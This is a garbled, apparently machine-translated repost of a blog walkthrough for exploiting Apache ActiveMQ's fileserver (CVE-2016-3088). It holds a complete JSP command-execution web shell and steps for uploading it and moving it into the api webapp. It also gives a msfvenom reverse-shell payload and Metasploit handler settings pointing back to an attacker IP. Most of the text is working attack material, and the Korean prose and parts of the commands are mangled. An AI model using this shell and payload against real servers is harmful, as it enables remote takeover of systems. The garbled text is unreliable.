아파치 ActiveMQ를 원격 코드 실행 취약점 (CVE-2016-3088)

简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。
8161端口为web控制台端口,本漏洞就出现在web控制台中。
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高而且文件操作容易出现漏洞。
所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

1. 직접 쓰기 쉘
직접 포스트에 BP 차단 후 액세스 http://120.79.1.70:8161/fileserver은 증가 뒤에 몇 줄에 넣어

<%@ page import="java.util.*,java.io.*"%> <% %> 
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment"> 
<INPUT TYPE="submit" VALUE="Send"> 
</FORM> <pre> 
<%
 if ( request.getParameter( "comment" ) != null )
 {
     out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
     Process p        = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
     OutputStream os    = p.getOutputStream();
     InputStream in        = p.getInputStream();
     DataInputStream dis    = new DataInputStream( in );
     String disr        = dis.readLine();
     while ( disr != null )
     {
         out.println( disr ); disr = dis.readLine();
     }
 }
 %>
 </pre> 
 </BODY></HTML>

도는 다음과 같습니다 chen.txt를 :
그림 삽입 설명 여기

다음 함께 다시 행 이동에 투입 한 후 (204)는, 성공적인 리턴을 나타냅니다

Destination:file:///opt/activemq/webapps/api/s.jsp

그림 삽입 설명 여기
마지막으로, 성공 API에 대한 뒷면에 직접 액세스를 추가
그림 삽입 설명 여기

2. 기록 쉘 크론 타이머 태스크를 사용하는 방법을
지금은 칼리 내부를 생성 ***
msfvenom -p 자바 / jsp_shell_reverse_tcp이 lhost LPORT = 9999 = R & 192.168.199.109 LT> bing.jsp
아래와 같이 그의 데스크탑 오픈 업로드 :
그림 삽입 설명 여기

같은 후 이전과 첫 줄 뒤에 줄을 추가

Destination:file:///opt/activemq/webapps/api/s.jsp

그림 삽입 설명 여기

이 웹 사이트에 있는지 확인하려면
그림 삽입 설명 여기

개방 후 칼리

use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.199.109
set lport 9999
run 

성공에 대기 해!

추천

출처blog.51cto.com/14259169/2463374